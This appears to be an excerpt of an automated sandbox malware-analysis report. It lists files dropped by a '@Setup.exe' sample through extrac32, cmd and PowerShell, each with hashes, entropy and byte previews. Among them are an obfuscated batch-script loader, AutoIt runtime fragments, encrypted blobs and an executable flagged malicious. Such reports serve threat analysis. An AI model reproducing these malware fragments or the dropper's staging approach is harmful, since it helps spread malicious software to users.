                                                                                                                                                  Entropy (8bit):7.997784398520827
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:OuNyCWXbvs4ZObeGtCPDp53hhwPRn4wWQLGotrmuD3ljrynEr4Nz:RyC+7s4ZZr5hwJn4l1qZryEr4h
                                                                                                                                                  MD5:5F4C387220525BFDCD11C22994EBD89C
                                                                                                                                                  SHA1:F852ABDDFC4D117C1A82BEC3151D23953B407C02
                                                                                                                                                  SHA-256:1DF09DC96DE0647DB6A2FFBCAE2C6F2403D949076E157FC53D160DB186AFA13B
                                                                                                                                                  SHA-512:FD80DB6B618C60F6F4E83C89B83712A848A9117C5C1A82C47D6B3E461D927C09CA30F2087A7BBCA84E72F3457229A97106F0AE157082F1ECA426CFFFDF72EEC4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[..\..%..}..jO;l.=.1...3.J...r....;..A...m.p(,C-..k...#5d).g.~.A..._.4..U.L........W...%.<,..W@..4.#C...<..N..ub.....a.....?|.S;Y1..L..T..7:..b^..J.[C#.Wd9M-...~Q...=..@...,.....K.........h-ea>:#5O.A..........g.W.;..p.t.e..!..XG...L..fj....4PJ...itE.....5..'q.3.....|..-.`.@)....D..E./..x i=zj.Q.?...8.....]..W<....k.{`...6..`..4a.tvj...`...}...2...-Y`.....r.a....r.............r.....iE..c...!.=.K.....\0..X..(..2.c...m..if_.....Q..I:lE@.,>8.peI.r.z...S.D.1Xg../..E....56.....m.VM.&#.,..[.....E*...;k...$J...w&.b`)..SlR#.6K3*.-S...6O..=.).C..r.%....b.Q........kM..TE.N. .S.....D~..YK3.......d.6.?.Ilw.....H...........!A...u.|.&<v`F.o...J[..6X...6..uG..oE......|4......P.z.&-9....h).i....C.........F.{O.s..F....@p6.1...#.~P...-..cJ.....,..I.........y.7...,.. .`....Q..i....Z......^..`.\.`)PWK..\...vG....`.n...W..A....T..|.F....V...W...'fK5.....8."..Kv.I.5.\:.Y..:nD.%IY..G.."#.).A2.@...yO.N*...b.E......yU..q...G.L.f..f..J...>.t ...EI8.*{..*.=..
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):143360
                                                                                                                                                  Entropy (8bit):6.423581662256162
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:LZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mK:LK5vPeDkjGgQaE/loUDtf0R
                                                                                                                                                  MD5:C0FCB52514333592FAE5BEF7BD3D9452
                                                                                                                                                  SHA1:923051344BF1DC2EB7FF4D7CB6AC167A052D9ABD
                                                                                                                                                  SHA-256:1C2EF5F83FBE1E4E7A974B9353922F4B70CF372B8E93868EECB2F074ACF84D10
                                                                                                                                                  SHA-512:1B831AB65EE03C4BF77B069C6EBD44262DEA3BAAB95C9DCC2FDE0EF52FEC1F873EEC73277009F669A37A49F811B17C906FAE7176BBBABA40D9F2724668DFEBE7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v.
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):116736
                                                                                                                                                  Entropy (8bit):6.706647075541251
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:JsZydTmRxlHS3NxrHSBRtNPnj0nEoXnml:JsZ7HS3zcNPj0nEo3u
                                                                                                                                                  MD5:624DE74D09FC16AC53BD84886DF03772
                                                                                                                                                  SHA1:51F88D92024C606D745F3ABB8C72545A45719146
                                                                                                                                                  SHA-256:75BEB07BC3C866A3DCF835467DE9406FCA887E0EADB8CA9C9CCD9CAC9793F1D9
                                                                                                                                                  SHA-512:F37410A8CCEAD0EAA965C459CB6AEBEF03EF9537D2110A951D1052BE646D184996E3AE869D77E975D394E38962A6438333CF31A404ECA9FC323C4BAC29F183F5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...E.@P.u.V.u..u..k..........]....&............E.9E........E.;F|..H..........E.......v...n.......................M..........E...M.@.E.P.u.V.u..u..........t.....E...}.@P.u...V.u..u..................E.9E...S...;~|.............U..t*..%....=....u.............%..............R.U..^...............E....E.@P.u...V.u..u..;..........z.....................;.......;......;................;......#................;...........E...}.@P.u...V.u..u..................E.9E...R....E....F|+.;.w.Q.u.W.-.......u..E..4.E.....Q.......F|+.;...A...Q.E.PW.R-.........+....E..E.<G.E...@..P.u.V.u..u..2..........r........E...}.@P.u...V.u..u.................E.;E.......;~|.........9M.t.9M.......@....E..E...@P.u.V.u..u.........t..v....E...@..P.u.V.u..u...........S....M.;M...%...;~|............9E........E.A@.M.P.u....V.u..u..H........t.......E...}.@P.u...V.u..u..!.......}................U.;U.......;~|..............%....=....u.............%..............9M...g...9M...^....E.B@.U.P.u....V.u..u....
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):77824
                                                                                                                                                  Entropy (8bit):7.9975813443297925
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:FhTKhpsn26n+uB6kCtKXk8DuBJT7kgZoeoarO8fLDnLHRWr:Fh2h6n27oCAqVg+oayiTMr
                                                                                                                                                  MD5:7E2099FF5529A022B19DD1F861FDC698
                                                                                                                                                  SHA1:CE6D83169226D5707886FBD9562FBC243BC7E24F
                                                                                                                                                  SHA-256:54C37EE09B08446B504FDCAF33F5B951503E41306FEED32D59D53715B24EA8EB
                                                                                                                                                  SHA-512:43D3683D4CB720EABB358A872D1DEE575521F5C1250A71DACB49C2D636E81DDF91DDADA877AED40A797AC8597DC365B00A2033FFCED5C32619EF6303105D001E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:J.p.....lT1.I1.....a...p....`...&.........D...^. ....).q.....).>H..p.).......NN..../.....K.bw.u...0y..0m..R.:...Eg!..@.k.).%|...~.Z.d.....k?)1.+"]..x..!U.qj......6[$.........c....>.3.....t...A..$4~.3...Y;...X.P.9....f...+/.z)yB'I...h.......qI.K.....L........&....T>.r..~Al..Z?`......U.&kpb......KWG..T.....}...<..7...pA....a......7.....)..I.q.t..N..p.f1.>...X...|..jjh.:...;..W..G|...^.B...Q@AdCz.J=@=......L.^^...Cy,.Q=.\n...../K0T.ND;.x=.{..,%]9..|..1K#..I.!.v.tN..p......x.yJf.s\..iO.mr..8.r.Q9......"..K.4...+..UY.9..^l.........5.$5.#A6i.R.G...O.c.?O.\...ob.H..P'.Pff...Y.}.%@b....4.{E..nA..cqU.n...&.7-...D8......}T..|....7.(..}#..Lh7V+>....t..9V....gN.._=....=..}.xl..O.v{v!t.....].....D....N...:..~..Ga.......Sso......+~...s.@.:.O.c.H.....3.v....;..K..DPrM.v_.@.=..N.*sOc.........zP(..nv...$.~.Q..@hK. .z..Z..(....(.`2y....y..:..b...l%aI:..+A.h(AN.J..=..*...f.9W...,}t....f....^....*#...w..?|.......W.....<.)..d..z..V.o..bG.s..t......d.P...S....
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):75776
                                                                                                                                                  Entropy (8bit):7.9972543326981285
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:Sq2OWdnVMGJsUza2VeiLbM6lXVqQi8abL1tUXnwsjG1UyKz98Ew5gw1qjWh:bGVMPULV5LbM6lYQi8acXFjGe3w5jgjO
                                                                                                                                                  MD5:35E5C93523B820B686E49AB7F8B7225B
                                                                                                                                                  SHA1:594BDD3EF07AE916B2D6FD7A9A660A3C03257686
                                                                                                                                                  SHA-256:90EC759F4A950D1213A1CE9AC4EF4EA74A5DF2A751D1636CF6A3F29337C1CE5E
                                                                                                                                                  SHA-512:B02AF765ADD72572B82045153C888E98B65D8DF6D22E826FE09D679311840403860B0D4C8A92BC6A86466AC14D3D0F1B5932D94213B0B5ECA8327989503F40C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:#}.....|..^b1.[.'.I.y..GP..E.....tG.c.....:....!...`6..."..fuZ.A...X.n.D.....m.@....0 ..f...3`._...]...6...S.D!.&N....x;.Sh..D....T.r.B.s..y...<..b.H?T......f....4.....IYhpa.(.G....=.".%..3.[..f.6.?.&.8.k....;..X....z..=.%.......hS.i..v....,n..).B..I.k.z.3Y}.a.f*z.R...'9.d1..........2........d..~...s....Al.......A.$|..^..o@`.[C.^7fA.'...9$.........5.v.M'Q..B...0..z$...@..].....K.......`..6.....<..e..:%^.....(O.q.Ji..k..4.\q......A.....w..kV...N..x.%...{..dB|.=...*.:b...o../C........QJ......D.TX..K..D.|..X.N.n=@....X...=...&..`M..*....\...x56..U8.O^0./..w.....}...h.~6'.>........s..)....t.~.>..W...^.?,...v..... ....y5..q...>.nC..S..M.B.6.C..BI..Mv..s.....Z.b../.,....XLWaC.g.#o#u+....NcFr<...Vu..\....KP....y...S,Kyq...J.L..k.l...Ru.T.3.Q..5... .....DK}P.u,....-..^."voatzQN.'.A{..N s......h+n.U..g..5...\AD..|.-`5.......y.|;...c..9j.].CC} ..x.w].".....`....D.$......q8~...|.`%.VZdJ..UW.C..h.u.`z../m.`%<.G{"x....Z...g...a/'C.j . ....b.X..
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1026), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19855
                                                                                                                                                  Entropy (8bit):5.158017725767561
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:qdcpwBsVNTq4v7MI6QoX8BeIeovmCx5MrjsQOyxdXqP0MYPgF:qdcaBShvYMBeIT8sQOqY0N4F
                                                                                                                                                  MD5:814EBB77812AB5CB563DAB78BCF5BF16
                                                                                                                                                  SHA1:CCA8B0E6606F4CFEA9A3D0AD021734EA03DB954F
                                                                                                                                                  SHA-256:E8A7541A207B22689AC0EF9DD2FC0E0343C138757CE67A733732ABEC547D4BBB
                                                                                                                                                  SHA-512:567609E3FDA5DC335EA68486F2EAF022DD049D068415A6D96AE0FBCD2DDA74B2E090652050B34364D88B050D12B6CA75AF2B084DACF5AA6A2401D071CB33006C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Set Relax=d..rxDoctor-Actively-Shift-Assists-Jpg-Copyright-Vitamin-Infectious-Fiscal-..xSlDen-Ensure-Quilt-Rugs-Claimed-Bound-Commitments-..eSRnPose-Solid-Chances-Nominations-Logos-Desktops-Attempting-..jaBRespondents-Valves-Luxembourg-..BqmLSpecialties-Verse-Viruses-Errors-Touched-..PgUtilize-Covers-Ad-Judges-Drunk-Opening-Contacting-Triple-Supplied-..ikqConsolidation-Link-Has-Circulation-Pay-Cave-Lights-Successful-Founded-..hRTpOccurrence-Viewed-Disclose-..gcDeposits-Dome-Pixel-..Set Monkey= ..EBXATall-Msn-Necessarily-Cutting-..ZcfKnowing-Bukkake-Directed-Surgical-Hits-..uMGSpecials-S-Stewart-Electronics-Citation-Mentioned-..ckYbEstates-Intend-Started-Letter-Carrier-Twenty-..OXuUMunicipality-Joining-Calm-World-Tried-Ease-Quantity-Stocks-Town-..IEEfficiency-..ILDExpanding-Among-..QPwVConceptual-She-Sporting-Postings-..UVKJSome-Kits-Utc-Diploma-..NqPJournal-Stat-Ladies-..Set Competitive=D..LvTreatment-Saves-Phillips-Trades-Learners-..dzkSeen-Hs-Diameter-Rover-Eu-Museums-Nn-..XEhSuffere
                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  File Type:ASCII text, with very long lines (1026), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19855
                                                                                                                                                  Entropy (8bit):5.158017725767561
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:qdcpwBsVNTq4v7MI6QoX8BeIeovmCx5MrjsQOyxdXqP0MYPgF:qdcaBShvYMBeIT8sQOqY0N4F
                                                                                                                                                  MD5:814EBB77812AB5CB563DAB78BCF5BF16
                                                                                                                                                  SHA1:CCA8B0E6606F4CFEA9A3D0AD021734EA03DB954F
                                                                                                                                                  SHA-256:E8A7541A207B22689AC0EF9DD2FC0E0343C138757CE67A733732ABEC547D4BBB
                                                                                                                                                  SHA-512:567609E3FDA5DC335EA68486F2EAF022DD049D068415A6D96AE0FBCD2DDA74B2E090652050B34364D88B050D12B6CA75AF2B084DACF5AA6A2401D071CB33006C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Set Relax=d..rxDoctor-Actively-Shift-Assists-Jpg-Copyright-Vitamin-Infectious-Fiscal-..xSlDen-Ensure-Quilt-Rugs-Claimed-Bound-Commitments-..eSRnPose-Solid-Chances-Nominations-Logos-Desktops-Attempting-..jaBRespondents-Valves-Luxembourg-..BqmLSpecialties-Verse-Viruses-Errors-Touched-..PgUtilize-Covers-Ad-Judges-Drunk-Opening-Contacting-Triple-Supplied-..ikqConsolidation-Link-Has-Circulation-Pay-Cave-Lights-Successful-Founded-..hRTpOccurrence-Viewed-Disclose-..gcDeposits-Dome-Pixel-..Set Monkey= ..EBXATall-Msn-Necessarily-Cutting-..ZcfKnowing-Bukkake-Directed-Surgical-Hits-..uMGSpecials-S-Stewart-Electronics-Citation-Mentioned-..ckYbEstates-Intend-Started-Letter-Carrier-Twenty-..OXuUMunicipality-Joining-Calm-World-Tried-Ease-Quantity-Stocks-Town-..IEEfficiency-..ILDExpanding-Among-..QPwVConceptual-She-Sporting-Postings-..UVKJSome-Kits-Utc-Diploma-..NqPJournal-Stat-Ladies-..Set Competitive=D..LvTreatment-Saves-Phillips-Trades-Learners-..dzkSeen-Hs-Diameter-Rover-Eu-Museums-Nn-..XEhSuffere
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):118784
                                                                                                                                                  Entropy (8bit):6.690954985204808
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:kKODOSpQSAU4CE0Imbi80PtCZEMnVIPPBxTV:qiS+SAhClbfSCOMVIPPLV
                                                                                                                                                  MD5:C17CB56ECA6EA2C083BE3B7E3CB9E6CC
                                                                                                                                                  SHA1:6BEA712C51F0F778DF348E74882AA5A52F002376
                                                                                                                                                  SHA-256:21183C3B4C28A8DF40AA14EEF21183EF0E10F793D4499B12493143D7FC55DEAB
                                                                                                                                                  SHA-512:A59774A96255E692E11277E9E6152418F40468AB0F3C9BA4CF8208C1DFD76846478C774AC23F3D0A6771E96CA82A4E6051D4B66F32485591A5A121C7BE7A86B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....U..E...S3.M.E...........>.}.......}........}.f..%.}.t..E....f...M.E....H.M.E..X9]...........].f.>#u..E..........Et...Ou.....u.E.RP.E.P.u....P.E.P.S.........E.t".M....U.....b.....t..].3.f..+]..4..t.......3.f....u...u........"......................}..t..M..P......[^_..]..U..E...t.....8....u.P.t...Y]..U..j.j..u..u..u..u..E......]..U..E.3.SVWf9.t,.u...>..f..t......f;.t.......f..u....3.f9.u.3._^[]..U..QQ...L.3.E.V.).........C.......S3.W......;.t..}.99t....;.u....t..y...u.3.........u.3..Y.@...............F..E..E..F..y.........B$.Pl...X....;.u..^......9.wOtD.9....t3.9....t".9....t..9....uo.F......f.F......].F......T.F......K.F......B.9....t3.9....t".9....t..9....u".F........F........F........F......v...j.....I...Y.^....q..Y.......I...E.Y.F...._[.M.3.^.b.....]..U.....}..Vt..}..t.....j.^.0...........SWh.....x.M.3.VW....I...."M..5."M...t.f9;u...E.}.P.E..}.PWWS....j..u..u..*....... ..u.."...j._.8.1.E.P.E.P.E....PVS.y.......}..u..E.H.."M......"M....J.E..}.PV......YY..t
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):88064
                                                                                                                                                  Entropy (8bit):6.60227174563806
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:yiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqayq:6wS2u5hVOoQ7t8T6pUkBJR8CThpmESv5
                                                                                                                                                  MD5:F4406488C5DE107CE2B16561DAB46576
                                                                                                                                                  SHA1:CEBF66F020DAF11D6A065254D047475AEDB1D0C3
                                                                                                                                                  SHA-256:6C839421913C40623C76CD28DC7DF6902645F07473C858B59FA949A8C4E3D3E5
                                                                                                                                                  SHA-512:D880F37061FDCCF3C75F90F2084D846E1CDD77333096E632E60E8AA943413B4528740DB109987C6C40E379E0A8C2CEC526886BE9DF20D2DF693286EC2AD74A7C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....u......Y..y.3..u..u..4..!K.....YY..t.F..c|.u...c.u.u:j..M.....M....P.^...................j..M..a...W...P.n....E...H!K..... K.uLQ.M.......................E.... K.8].t.j....}..t.j.P.`.......WP......................$...F.j..M..$.....t..~....d....]..t..~....T....F...@....E..P.j....0...j..M.......E....u(.E..P..........~........j..M......F...E..P. .........~........j..M......h.....M.......t..~.........k....k....~.........F......h.....M..H.....t..~.........F....../....~....p....F...\....~....]...j..M.......F...I....~....@...j..M.......~....*...j..M.......F........~........j..M......F........~........j[.M......F........~........j[.M..{....F.......~........j\.M..^....F.......~........j\.M..A....F...~3.9^ t.j.W...o....v8^.u.j..M.......E..P......W.M....f9.t2W.M.....M...0...P......E..P.R....E..P....G..8^.u.j..M......E..P.o....M......M....._^[........F..F..F...F...F...F...F...F.4.F.Q.F.k.F...F.x.F...F.Q.F.U....VW.}....~TS.M.._....u..;...3...E.f.E..
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):134345
                                                                                                                                                  Entropy (8bit):6.031152083817129
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:NhxjgarB/5elDWy4ZNoGmROL7F1G7ho2kOb:tgarZ8aBZ2GmRq76tl
                                                                                                                                                  MD5:A3E11455D7E97DD6794BB6AB3459FB7A
                                                                                                                                                  SHA1:B20C7AB1ED6F8DF8C2FE4633E111BF771E01FC90
                                                                                                                                                  SHA-256:C84C3B73D7DB6A8A8FECAD747C3CF9E2DF6F9EED57F8E7215ABA685B22A6A83C
                                                                                                                                                  SHA-512:1C96B0F6DDB8FEAF0C36D7B381B984B2C5D7CF2E9451CD3B281B788C08FB8BDCD89992D73CF4996D6ADB3722C081FCF809D1289777629FEE9E419CB68A7FF0B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.i.S.C.S.I...S.A.S...S.A.T.A.....S.D.....M.M.C...V.i.r.t.u.a.l...F.i.l.e.B.a.c.k.e.d.V.i.r.t.u.a.l...R.E.A.D.Y...I.N.V.A.L.I.D...N.O.T.R.E.A.D.Y.....R.E.A.D.O.N.L.Y.....U.N.K.N.O.W.N...%.l.u...\.?.?.\.%.s.......l.n.k.......*.....R...A...N...O...C...T...6Q.B~.C....]._.G.U.I._.R.U.N.D.E.F.M.S.G...<.l.o.c.a.l.>...E.n.v.i.r.o.n.m.e.n.t...D.I.S.P.L.A.Y...m.s.c.t.l.s._.p.r.o.g.r.e.s.s.3.2...A.U.T.O.I.T.C.A.L.L.V.A.R.I.A.B.L.E.%.d.....,. .$...^.[.A.-.Z.\.d._.].+.$...Ping............2.5.5...2.5.5...2.5.5...2.5.5...I.n.t.3.2...I.n.t.6.4...D.o.u.b.l.e.....S.t.r.i.n.g.....A.r.r.a.y...D.L.L.S.t.r.u.c.t...R.e.f.e.r.e.n.c.e...P.t.r...O.b.j.e.c.t.....B.o.o.l.....K.e.y.w.o.r.d...B.i.n.a.r.y.....F.u.n.c.t.i.o.n.....U.s.e.r.F.u.n.c.t.i.o.n.....M.a.p...N.U.L.L. .P.o.i.n.t.e.r. .a.s.s.i.g.n.m.e.n.t...I.n.c.o.r.r.e.c.t. .P.a.r.a.m.e.t.e.r. .f.o.r.m.a.t.....A.U.T.O.I.T...E.R.R.O.R....._.N.e.w.E.n.u.m.....g.e.t._._.N.e.w.E.n.u.m.........N.u.l.l. .O.b.j.e.c.t. .a.s.s.i.g.n.m.e.n.t. .i.n. .F.O.R.....I.N. .l.o
                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):54272
                                                                                                                                                  Entropy (8bit):6.615756979405012
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:sKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOt:sccBiqXvpgF4qv+32eOt
                                                                                                                                                  MD5:374B2CEFE3CDF2BAB0B29480D2403189
                                                                                                                                                  SHA1:E02E22DB78355FB4A475F5FC8E53DCF9FAB4BC10
                                                                                                                                                  SHA-256:B6E773A0F247C4BB5179DE449D8CFA7A5C2460B2A26B3C5FC131B0A6A7FD1599
                                                                                                                                                  SHA-512:A50E1C62788BAA408BED66DFBED48ED9058EDA2A6B099642B430E05CD525953A45AE4C70F5B2B0902877396C4768F62D1AEF92336AFFDEFEBA2AA08F3A21D147
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..@u.j..u$.u Rj.PS.u..u..u.W.......,.M..E..F;u.r..Y....-....U..U.SVW.B...tv.H..9.tn....}.t....ua._.3.;.t0.C...:.u...t..Y.:X.u.........u...........t.3..+...t....t..E....t....t....t....t.3.F....3.@_^[].U..SVW.u......Y.w....M.3..U......."...9p u".:csm.t..:&...t...#.;.r..A ........B.ft&9q.......9u.......Q.u..u..+..........9q.u...#.=!...r.9q.u.;.rh.A .....t^.:csm.u:.z..r49z.v/.B..p...t%..E$P.u .u.Q.u....u..u.R....I.... ...u .u..u$Q.u..u..u.R....... 3.@_^[].U..V.u............J...^]....a.....a...A...J.....J..U..E....P.A.P.......Y..Y..]...j<h..L.......E..E.e...]..C..E.}..w..E.P.{...YY.E.......@..E.......@..E.......x.......M..H..e..3.@.E..E..u .u..u..u.S.A........].e.......u..j...Y.e......` ..}..G..E.W.u..].S.........E..W.3.M.9O.v:k...].;D...].~".}.;D...}...k...D..@.E..M....E...A.M.;O.r.PWj.S.Q......3.].!]..}..E......E............M.d......Y_^[..}..].E.M..A..u..t...Y......M.H.......M.H..?csm.uK....uE... ...t....!...t...."...u*.}..u$..t .w......Y..t..}........PW.(...YY.j..N'D
                                                                                                                                                  Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):59392
                                                                                                                                                  Entropy (8bit):7.996889729746481
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:YxB2e7zMzvyxFikH0xJdDYjhI5QFRb4Yhc:YxB2Tzvy7ikH0BDYj6AFla
                                                                                                                                                  MD5:9451AF27C4CF82E71143E4ADF789CC0B
                                                                                                                                                  SHA1:BDE789BC9F480FFA78C6281A543CFB2848CF069D
                                                                                                                                                  SHA-256:393B3DAC0D5D3E7A66B91857F78901CB196DBB180DBC20D93C3D2232122D8393
                                                                                                                                                  SHA-512:5AB29E9A1DFE3E656521FCB4178CA7FA6E1C6CF5547410977C391A41E72FC34BD3C3628B7E3CC1B601E84D445B09441919E0AC8FC1238AD59B0E1355E28DDE70
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..\..bD.%.b.F...E.!... LH....G.k..+XS.6......3}..&..<YNT..W.....X.... K........S...........\...{?.s..;..S7...d...wBg..Y.I7a..k..N.[4.[...)J.L[.kA..z...J.].d.....^^n.g{../.iz..%.."...A.uW|;v. I....k.%/......I.?.~.........@s!.ZPci...d.\B.V...396!.iFB....aDW....%.O....u...:d...<.l..!.......$.{...S.Z.}...c.l.P..o...C~h..?ol.JNbMd....s9o..^. .C0.7z..jH.q=`D...=.(2V).BN.e.i...(.>..T.A.r5.*-.!w......,....'......Vu.....ui7..H.&7;.".......2.[U...#...h.s.....n.....+pk'..C[.d}..5a.T:..5N.....-`...'..n...rI.4(a..9.......!O...-|..N......H.....(..K.+.C.p.......)......W.7W.[mH..~1.m...1.m./....d..<."S....i.B.i...."Zf.d..E(h.....s.[...(.\..+....B?NX.j...'e.R.o...B...1..._.b.9E..D.u..B..).vB.:......w...h.Ic......P..1..&e.........I......y.i*...(^.......]..I..|.U.."H@..3..:.Q......x.....T......a)<P."H...".{.W...;...FP`u.?d%.+8.=.i...ak...O...."...H...(..2.>.......|JuV..y%4C...XY...}..X81k..}.l0.mV.R.EKw...~..o...N...<%0.[.5.h.?....1Z.................
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):64
                                                                                                                                                  Entropy (8bit):1.1510207563435464
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                  MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                  SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                  SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                  SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@...e.................................,..............@..........
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8767044
                                                                                                                                                  Entropy (8bit):7.960152326344281
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                  MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                  SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                  SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                  SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
